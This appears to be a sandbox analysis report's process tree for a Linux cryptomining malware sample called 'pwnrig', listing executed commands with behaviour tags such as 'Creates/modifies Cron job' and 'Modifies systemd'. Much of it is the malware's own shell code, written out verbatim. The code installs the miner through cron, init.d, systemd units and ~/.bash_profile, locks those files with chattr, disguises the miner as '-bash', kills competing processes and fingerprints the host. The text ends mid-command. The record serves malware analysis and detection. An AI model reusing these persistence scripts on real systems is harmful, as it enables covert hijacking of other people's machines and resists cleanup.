- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/crontabcrontab -r1⤵
-
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads runtime system information
-
/usr/bin/pkillpkill -f .klibsystem41⤵
- Reads runtime system information
-
/usr/bin/bashbash -c "echo \"* * * * * /usr/local/share/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵
-
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
- Attempts to change immutable files
-
/usr/bin/whoamiwhoami3⤵
-
/usr/bin/hostnamehostname3⤵
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
-
/usr/bin/idid -u3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/grepgrep /etc/cron3⤵
-
/usr/bin/psps x3⤵
- Reads CPU attributes
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
-
/usr/bin/idid -u3⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
-
/usr/bin/rmrm -rf /bin/bprofr3⤵
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr3⤵
- Writes file to system bin folder
-
/usr/bin/idid -u3⤵
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
-
/usr/bin/rmrm -rf /bin/crondr3⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr3⤵
- Writes file to system bin folder
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵
-
/usr/bin/whichwhich chkconfig3⤵
-
/usr/bin/whichwhich update-rc.d3⤵
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵
- Flushes firewall rules
-
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig4⤵
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig4⤵
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig4⤵
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig4⤵
- Reads EFI boot settings
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
-
/usr/bin/rmrm -rf /bin/initdr3⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr3⤵
- Writes file to system bin folder
-
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵
-
/usr/bin/whichwhich systemctl3⤵
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵
-
/usr/bin/rmrm -rf /bin/sysdr3⤵
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr3⤵
- Writes file to system bin folder
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵
- Attempts to change immutable files
-
/usr/bin/systemctlsystemctl enable pwnrige.service3⤵
- Reads EFI boot settings
-
/usr/bin/systemctlsystemctl enable pwnrigl.service3⤵
- Reads EFI boot settings
-
/usr/bin/systemctlsystemctl daemon-reload3⤵
- Reads EFI boot settings
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵
- Reads EFI boot settings
-
/usr/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/grepgrep "Port "1⤵
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/sedsed -e "s/\$//"1⤵
-
/usr/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/cutcut -d: -f21⤵
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
-
/usr/bin/whoamiwhoami3⤵
-
/usr/bin/hostnamehostname3⤵
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/idid -u3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/grepgrep /etc/cron3⤵
-
/usr/bin/psps x3⤵
- Reads runtime system information
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/psps aux3⤵
- Reads runtime system information
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/hostnamehostname -I1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/grepgrep "Port "1⤵
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/sedsed -e "s/\$//"1⤵
-
/usr/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/cutcut -d: -f21⤵
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/wcwc -l1⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵
-
/usr/bin/grepgrep -v grep1⤵
-
/usr/bin/psps aux1⤵
-
/usr/bin/crontabcrontab -r1⤵
-
/usr/bin/pkillpkill -f .klibsystem51⤵
-
/usr/bin/pkillpkill -f .klibsystem41⤵
- Reads CPU attributes
-
/usr/bin/bashbash -c "echo \"* * * * * /tmp/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib41⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib41⤵
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵
-
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵
- Attempts to change immutable files
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
-
/usr/bin/whoamiwhoami3⤵
-
/usr/bin/hostnamehostname3⤵
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵
-
/usr/bin/psps -A "-ostat,ppid"3⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/grepgrep /etc/cron3⤵
-
/usr/bin/psps x3⤵
- Reads runtime system information
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 